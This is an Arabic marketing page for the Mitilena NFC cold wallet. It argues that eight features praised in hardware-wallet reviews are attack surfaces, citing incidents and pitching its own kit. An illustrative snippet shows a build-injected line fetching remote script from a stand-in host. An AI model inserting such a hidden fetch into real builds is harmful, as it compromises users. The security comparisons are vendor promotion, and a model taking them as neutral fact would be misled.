8 ثغرات شيفرة مفتوحة قائمة الفحص أسئلة
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS إنشاء محفظةإنشاء
محافظ عتادية · ثغرات غير واضحة

ثغرات غير واضحة في المحفظة العتادية

تشتري جهازًا لتسدّ الثقوب. معه تأتي ثقوب جديدة: البرنامج الثابت، التحديثات، خدمة على حاسوبك، شاشة، صندوق، حساب عند البائع. ثمانية تفاصيل تُدرَج في المراجعات كإيجابيات — وثمانية طرق أُخذ بها المال عبرها بين 2020 و2026.

حوادث حقيقية بتواريخ ومبالغ من وثائق الشركات المصنّعة نقيّم طقمنا على القائمة نفسها
ثمن الخطأحالات علنية
2026Coldcard · عشوائية ضعيفة في البرنامج الثابت$100M+
2025Bybit · الموقّعون وقّعوا ما لم يروه$1.5B
2024Dark Skippy · البذرة تتسرب عبر توقيعينبحث
2023Ledger Connect Kit · باب خلفي في مكتبة$600K
2021تطبيق محفظة مزيف في App Store17,1 BTC
2020تسريب قاعدة عملاء Ledger · تصيّد لسنوات270,000 شخص
ثماني ثغرات

كل تفصيل تمدحه المراجعات ثقب منفصل

المحفظة العتادية تسدّ ثقبًا واحدًا: المفتاح لم يعد يقبع على هاتف متصل بالإنترنت. لكن الجهاز ليس فارغًا. فيه برنامج ثابت وتحديثات وبرنامج للحاسوب وشاشة وصندوق وبائع يعرف عنوانك — وكل تفصيل يضيف سطح هجوم لم يكن لديك. أدناه ثمانية تفاصيل كهذه: ماذا تقول المراجعات، كيف أُخذ المال عبرها، كيف تُغلَق الثغرة، وهل لهذا التفصيل وجود في طقمنا.

ثغرة 01

برنامج ثابت يولّد مفتاحك

في المراجعات: «رقاقة آمنة — المفتاح يُنشأ داخل الجهاز ولا يغادره أبدًا»

المفتاح رقم عشوائي هائل، والبرنامج الثابت هو من يصنعه. خطأ واحد هناك — والمفاتيح أقل بكثير مما تظن: تُكسَر بالقوة الغاشمة لدى كل المالكين دفعة واحدة، بلا وصول للجهاز، بعد سنوات من الشراء. الشريحة لا دخل لها؛ الثقب فوقها.

الحادث
$100M+
Coldcard، يوليو 2026: خطأ في بناء البرنامج الثابت منذ 2021 استبدل بهدوء مولّد العشوائية العتادي بآخر ضعيف مُبذَر من الرقم التسلسلي للجهاز ومؤقت. قوة المفاتيح هبطت إلى نحو 40 بت؛ أكثر من 5,000 عنوان فُرّغ.
كيف تُغلَق الثغرة
هل يمكنك جلب عشوائيتك أنت: رمي نرد، عبارتك الخاصة. محفظة تقبل الإنتروبيا منك لا تعتمد على خطأ واحد في البرنامج الثابت.
هذا التفصيل غير موجود عندنا
لا برنامج ثابت على البطاقة — إنها حامل مشفّر. Mitilena Air يولّد المفتاح من مولّد عشوائية نظام الجهاز، ويمكنك تعيين عبارة بذرة خاصة بدل كلمات عشوائية.
ثغرة 02

تحديثات تُجبَر على تثبيتها

في المراجعات: «الشركة تصدر تحديثات أمان بانتظام»

كل تحديث لحظة يمكن فيها استبدال البرنامج الثابت. برنامج ثابت مُعدَّل يخفي أجزاء البذرة في توقيعين أو ثلاثة عادية بينما يبدو الجهاز طبيعيًا من الخارج. وتخطّي التحديثات ليس خيارًا أيضًا: الثقوب تُسدّ بتلك التحديثات نفسها.

الحادث
توقيعان
Dark Skippy، أغسطس 2024: أظهر الباحثون أن برنامجًا ثابتًا خبيثًا لمحفظة عتادية يمكنه تهريب البذرة كاملة عبر معاملتين. تحديث واحد من مكان خاطئ يكفي.
كيف تُغلَق الثغرة
من أين يأتي البرنامج الثابت وهل يتحقق الجهاز من توقيعه. الأفضل أن لا يكون هناك ما يُحدَّث أصلًا.
هذا التفصيل غير موجود عندنا
لا شيء على البطاقة للتحديث أو الاستبدال. التوقيع في تطبيق الهاتف؛ بناءاته موقَّعة وتأتي من App Store وGoogle Play — كأي تطبيق تراه وتغلقه بنفسك.
ثغرة 03 · اشعر بالعبث
في المراجعات: «تطبيق سطح مكتب مريح من الشركة»

محفظة لعدم الثقة يُرفَق بها خدمة خلفية

تشتري الجهاز لسبب واحد: لتتوقف عن الثقة بالحاسوب. ولكي يعمل يجب تثبيت خدمة خلفية على الحاسوب نفسه. لم تكتبها، لم تشغّلها، ولا تتحكم بها: تنطلق مع النظام، تستمع على منفذ يمكن لأي برنامج على جهازك طرقه، وتفعل شيئًا الآن — ماذا بالضبط لا تعرف ولن تتحقق أبدًا.

ظلت تعمل في الخلفية بعد أن أغلقت المحفظة. لسنوات. عند أحد أكبر المنتجين كانت خدمة «جسر» منفصلة؛ في 2025 أخفوها داخل التطبيق نفسه — الخدمة ما زالت هناك، تموت فقط مع النافذة. عند معظم الآخرين، بلا برنامج سطح مكتب يصبح الجهاز ميدالية مفاتيح. على Linux أضف قواعد udev وإلا لن يسلّم النظام منفذ USB.

إذن الشيء الذي اشتريته لتتوقف عن الاعتماد على برامج الحاسوب لا يعمل بلا برنامج حاسوب. وليس الذي تراه — بل الذي يعمل تحته.

هذا التفصيل غير موجود عندنا
لا يُثبَّت شيء على الحاسوب: لا خدمة ولا تعريف ولا منفذ. الوسيط هو شريحة NFC الموجودة أصلًا في هاتفك، من صنع مصنّعه وتحت حكم نظام التشغيل: تعمل فقط حين التطبيق مفتوح وأنت تقرّب البطاقة بنفسك، والهاتف يطلب الإذن في كل مرة. البطاقة سلبية: بلا بطارية وبلا راديو، لا تفعل شيئًا وحدها. أغلقت التطبيق — لم يبقَ شيء يعمل بدونك. بصراحة: تطبيق الهاتف ما زال مطلوبًا، وهو كأي تطبيق آخر — تراه وتشغّله وتغلقه بنفسك. لا أحد يسكن في غرفة الخدمات.
مراقبة النظامالمحفظة مغلقة
العمليةالحالةالتشغيل
HW Wallet Appwallet
أغلقتها أنت-
hwwalletdخدمة خلفية · جسر USB
تعمل412d 06:14
شغّلها النظام عند الدخوللا يمكن إغلاقها — إنها خدمة
نموذج؛ الأسماء توضيحية. هكذا بدا حاسوب مع إحدى أشهر محافظ USB قبل 2025؛ ثم بُني «الجسر» داخل التطبيق نفسه — نفس الخدمة، لكنها لم تعد ظاهرة في القائمة.
تشبيه
بيت للخصوصية — ومستأجر في غرفة الخدمات

أردت بيتًا للخصوصية. اشتريته. ثم احتجت أمنًا — ثبّتته. ولكي يعمل اشتراك الأمن طلبوا منك إدخال شخص بزيّ رسمي إلى البيت يعيش في غرفة خدماتك ليل نهار، يملك مفاتيح كل الأبواب، ويقدّم تقارير لغيرك. لم توظّفه، ولا تستطيع فصله، وما يفعله ليلًا — لا تعرفه.

هو «منّا» طبعًا. مكتوب في العقد. أردت خصوصية فحصلت على بديل زائف: بيت فيه مستأجر لم تختره.

ثغرة 04 · الشيفرة المفتوحة ليست تدقيقًا
في المراجعات: «شيفرة مفتوحة — أي شخص يستطيع التحقق»

الشيفرة المفتوحة طريقة يعمل بها المبرمجون معًا، لا شارة بأن البرنامج لا يسرق

الشيفرة المفتوحة اختُرعت ليشارك الناس البرامج ويصلحوها معًا. كأداة تعاون ممتازة. لم تكن يومًا ختم جودة بأن «هذا البرنامج لن يسرق أموالك»، وإليك السبب: أنت لا تستخدم الشيفرة المصدرية. تستخدم ما نزّلته.

بين مستودع GitHub والملف على هاتفك تقف البناء ومتجر التطبيقات والتحديث والسيرفر. في أي من هذه الخطوات يمكن أن تدخل سطرًا واحدًا يسحب أي شيء من أي مكان — ولن يكون في المستودع. لا تستطيع مقارنة نسختك بالمصدر: المتاجر تسلّم ملفًا مُجمَّعًا؛ محفظة الويب تتلقى الشيفرة التي قرر السيرفر إرسالها لك اليوم؛ إضافة المتصفح تتحدث بصمت ليلًا.

«مفتوح» يعني أن بعض الناس يمكنهم فحص نسخة ما في يوم ما. ما تفعله نسختك الآن — هذا لا يعنيه.

في المستودع · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
على هاتفك · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
سطر واحد في البناء. ليس في المستودع، غير مرئي في المتجر، يعمل على جهازك.
الانفتاح لم يوقف أيًا من هذه الحالات
Ledger Connect Kit2023
مكتبة مفتوحة على GitHub؛ نُشرت نسخة خبيثة على npm؛ عشرات المواقع حمّلتها حيّة خلال ساعات
Copay / event-stream2018
محفظة مفتوحة؛ الباب الخلفي جاء عبر تبعية استهدفتها تحديدًا
xz utils2024
مفتوحة عشرين سنة؛ باب خلفي جلس في الإصدارات حتى لاحظ مهندس أن دخول SSH صار أبطأ بنصف ثانية
Coldcard2026
برنامج ثابت مفتوح المصدر؛ خطأ بناء لخمس سنوات استبدل مولّد العشوائية العتادي بضعيف — مفاتيح فُكّت بلا وصول للجهاز، أكثر من 5,000 عنوان، أكثر من 100 مليون $
ما يعمل فعلًا
ليس قراءة شيفرة غيرك — فحصان يستطيع أي شخص تشغيلهما. الأول تدقيق سلوك: ضع بروكسي اعتراض على حاسوبك، مرّر التطبيق عبره، وراقب ماذا يرسل وإلى أين. لا حاجة لقراءة الشيفرة — الترافيك مرئي بالكامل. الثاني معمارية لا تملك الشيفرة فيها ما تسرقه: إن لم يقبع المفتاح أبدًا على جهاز متصل، فأي سطر في أي تحديث عاجز — ليس لديه ما يرسله.
كيف نفعل ذلك
نقترح الأول بأنفسنا: مرّر تطبيقنا عبر بروكسي، والنسخة الويب عبر DevTools المتصفح، وافحص كل طلب. مفتاح التوقيع والبذرة لن يظهرا؛ الاستثناء الوحيد مفتاح عرض Monero — مشروح في صفحة «كيف تخرج التحويلة». الثاني في الطقم: المفتاح يولد في Mitilena Air على جهاز بلا إنترنت، يعيش على البطاقة، ولا يصل للتطبيق المتصل سوى التوقيع — لا شيء هناك لتمريره عبر البروكسي. والانقطاع هنا حقيقي: في وضع air-gap جهاز المفتاح غير متصل بشيء — لا كابل ولا Bluetooth؛ المعاملة تدخل وتخرج كرمز QR تراه بعينيك. ليست محفظة «باردة» على سلك معلّقة بحاسوب متصل مع خدمة تتبادل معه من يدري ماذا.
ثغرة 05

شاشة لا تُظهر ما توقّعه

في المراجعات: «تأكيد على شاشة الجهاز — فيروس على الحاسوب عاجز»

الشاشة صغيرة، وغالبًا تعرض هاشًا أو «استدعاء عقد» لا العنوان والمبلغ. تؤكد ما لا تراه — والتوقيع مع ذلك صادق، توقيعك. الشاشة تعطي شعورًا بالسيطرة غير موجود.

الحادث
$1.5B
Bybit، فبراير 2025: موقّعون بمحافظ عتادية أكدوا تحويلة بدت عادية في الواجهة. الأجهزة أظهرت بيانات لا يستطيع الإنسان مطابقتها.
كيف تُغلَق الثغرة
المستلم والمبلغ ونوع العملية بلغة بشرية — لا هاش — ورفض بزر واحد.
كيف نفعل ذلك
توجد شاشة، لكنها شاشة الهاتف: العنوان والمبلغ ونوع الطلب بكلمات — تحويل، استدعاء عقد، موافقة — وزر «رفض». للمبالغ الكبيرة — جهاز منفصل بلا شبكة تصل إليه المعاملة كاملة.
ثغرة 06

صندوق فيه بذرة جاهزة

في المراجعات: «يصل في صندوق مختوم بختم أمان»

الجهاز المادي يعني شحنًا ووسطاء وأسواق «بخصم». المحفظة تصل مُعدَّة مسبقًا وبذرة على ورقة داخلها. أو يطلب تطبيق شبيه في المتجر «إدخال البذرة للتفعيل».

الحادث
17,1 BTC
App Store، 2021: مالك محفظة عتادية أدخل البذرة في تطبيق شبيه وخسر 17.1 BTC. في السنة نفسها، بعد تسريب القاعدة، أُرسلت لعملاء Ledger أجهزة مزيفة مع رسالة «انقل بذرتك إلى الجديد».
كيف تُغلَق الثغرة
هيّئها بنفسك ولا تستخدم بذرة وصلت مكتوبة جاهزة. الختم ليس تحققًا؛ التحقق أنك أنت من ينشئ المفتاح.
كيف نفعل ذلك
البطاقات تصل فارغة: تنشئ المفتاح وتكتبه بنفسك — لا يمكن أن تكون بذرة جاهزة في الصندوق. التطبيق يأتي فقط من App Store وGoogle Play عبر روابط الموقع؛ يطلب بذرة فقط عند الاستيراد والتوقيع.
ثغرة 07

حساب عند البائع

في المراجعات: «ضمان رسمي ودعم وحساب شخصي»

لشراء الجهاز تعطي الشركة اسمك وبريدك وعنوان الشحن. أمانك صار يعتمد على قاعدتهم. إن تسربت — لسنوات تصلك رسائل «أكد البذرة على جهاز جديد»، أحيانًا مع طرود.

الحادث
270,000 شخص
Ledger، 2020: تسربت بيانات 270,000 مشترٍ بما فيها العناوين البريدية. رسائل ومكالمات وطرود تطلب «نقل» البذرة مستمرة حتى اليوم.
كيف تُغلَق الثغرة
كلما قلّ ما يعرفونه عنك قصر متجه الهجوم: اشترِ بلا حساب، دعم لا يطلب البذرة أبدًا، وقاعدة «من يطلب البذرة لصّ».
هذا التفصيل غير موجود عندنا
المحفظة تعمل بلا تسجيل — لا حساب. البائع يعرف عنوان الشحن فقط. لا الدعم ولا التطبيق يطلبان البذرة.
ثغرة 08

جهاز واحد وورقة واحدة

في المراجعات: «هيكل متين وشاشة كبيرة وبطارية لأسبوع»

كلما كثرت القطع كثرت الأعطال: موصل، شاشة، بطارية. الاستعادة معلّقة بورقة بذرة واحدة — بُلّلت، ضاعت في انتقال، صُوّرت «احتياطًا». أشيع سبب للخسارة ليس اختراقًا.

الحادث
≈20 % BTC
تقدّر Chainalysis أن نحو خُمس البيتكوين كله ضائع إلى الأبد — أغلبه من مفاتيح مفقودة لا من اختراقات.
كيف تُغلَق الثغرة
كم نسخة مفتاح تصل في الصندوق وبأي شكل، ماذا يحدث إن ضاع الجهاز، وهل فيه شيء يمكن أن يتعطل.
هذا التفصيل غير موجود عندنا
لا شاشة ولا بطارية ولا موصل — لا شيء يتعطل. وليست نسخة واحدة: خمس نسخ مرآة في الصندوق — بطاقتا NFC وثلاث ملصقات خفية في بلاستيك مقاوم للماء، عمر أكثر من 10 سنوات.
قائمة الفحص

ما يجب ألا يكون في المحفظة

ثمانية تفاصيل لثماني ثغرات. القائمة تصلح لأي محفظة — عتادية أو هاتف أو متصفح. ضع علامة على ما لدى التي تختارها — وعلى ما لدينا أيضًا.

01
مفتاح يولّده البرنامج وحدهبلا عشوائيتك أنت — عبارتك أو النرد
02
تحديثات حيث يعيش المفتاحكل تحديث فرصة لاستبدال الشيفرة
03
خدمة أو تعريف أو منفذ على الحاسوبانظر الثغرة 03
04
شارة «شيفرة مفتوحة» بدل المعماريةالمفتاح يقبع حيث تصل إليه شيفرة أجنبية
05
شاشة تعرض هاشًا بدل العنوان والمبلغوبلا زر رفض
06
بذرة وصلت مكتوبة جاهزةفي الصندوق، في رسالة، في «تطبيق تفعيل»
07
حساب عند البائعودعم قد يطلب البذرة
08
نسخة واحدة وقطع تتعطلشاشة، بطارية، موصل، ورقة واحدة
على هذه القائمة، طقم Ultimate لا يملك أيًا من التفاصيل الثمانية. في الصندوق: بطاقتا NFC وثلاث ملصقات خفية، Mitilena Air (مفاتيح بلا إنترنت) وMitilena Keys (توقيع بلا إنترنت). البطاقات تصل فارغة: تنشئ المفتاح وتشفّره أنت — لا شريحة مصنع. المحتويات والسعر ←
Ultimate · طقم دون اتصال

ليست «رقاقة آمنة» من المصنع — حامل تشفّره أنت

البطاقات تصل فارغة. تنشئ المفتاح في Mitilena Air على هاتف بلا إنترنت وتكتبه بنفسك. التوقيع عبر Mitilena Keys، أيضًا دون اتصال: المعاملة تنتقل بـ QR. خمس نسخ متطابقة في الصندوق: بطاقتا NFC وثلاث ملصقات خفية في بلاستيك مقاوم للماء. 18 شبكة، أكثر من 20,000 عملة، بما فيها USDT.

لا يُثبَّت شيء على الحاسوب
لا برنامج ثابت ولا تحديثات ولا شاشة ولا بطارية
المعاملة إلى هاتف دون اتصال — بالصوت أو QR، بلا كابل ولا USB
يعمل مع تطبيق Mitilena المجاني على الهاتف
بلاستيك مقاوم للماء، صلاحية أكثر من 10 سنوات
شحن عالمي · mitilena-store.com
بطاقة Mitilena NFC
Ultimate · توليد وتوقيع دون اتصال
€369€439
بطاقتا NFC · 3 ملصقات خفية · Mitilena Air · رخصة Mitilena Keys
اشترِ Ultimate · €369 Basic وPremium — كل الخطط
أسئلة شائعة

ما يسأله الناس بعد القراءة حتى هنا

إيجابيات وسلبيات المحفظة العتادية — باختصار؟

إيجابية كبيرة واحدة: المفتاح ليس على هاتف متصل بالإنترنت. السلبيات هي التفاصيل الثمانية أعلاه — كل منها يضيف سطح هجوم. المحفظة العتادية الجيدة هي ذات التفاصيل الأقل، لا الأكثر.

ماذا لو اختُرق الهاتف؟

مع بطاقة على هاتفك الرئيسي يظهر المفتاح في بيئة معزولة لثانية التوقيع — نفس خطر أي محفظة هاتف، أقصر فقط. للمبالغ التي تخيفك — طبقة ثانية: وقّع على جهاز منفصل دون اتصال تصل إليه المعاملة بـ QR.

ماذا لو سُرقت البطاقة أو ضاعت؟

بلا كلمة المرور البطاقة والملصق بلاستيك عديم الفائدة — المفتاح عليهما مشفّر. النسخة الضائعة تُعوَّض بالأربع الأخرى: بطاقتان وثلاث ملصقات من الصندوق مرايا.

هل يجب تحديث البرنامج الثابت للمحفظة العتادية؟

إن سدّت الشركة ثقبًا — نعم، وتلك بالضبط لحظة يمكن فيها استبدال البرنامج الثابت: تحقق من المصدر والتوقيع. حامل بلا برنامج ثابت لا يواجه هذا الخيار — لا شيء للتحديث ولا للاستبدال.

ما الفرق عن محفظة USB؟

وسطاء أقل: لا كابل ولا تعريف ولا خدمة خلفية ولا برنامج سطح مكتب. وسيط واحد — شريحة NFC في هاتفك — وتجيب لك ولنظام التشغيل، لا لبائع المحفظة.

هل الشيفرة المفتوحة تعني الأمان؟

تعني قابلة للفحص من شخص ما في وقت ما. أنت تستخدم لا الشيفرة بل ما نزّلته، ولا تستطيع مقارنة أحدهما بالآخر. الأمان يأتي من معمارية لا يكون فيها المفتاح حيث تصل إليه شيفرة أجنبية.

بطاقات NFC بتوليد وتوقيع دون اتصال

5 نسخ من المفتاح · Air · Keys · أو محفظة مجانية خلال 30 ثانية · لماذا تكون محفظة عتادية «باردة» قائمة على شريحة المصنع غالبًا زائفة ←
اشترِ Ultimate · €369 أنشئ محفظة مجانية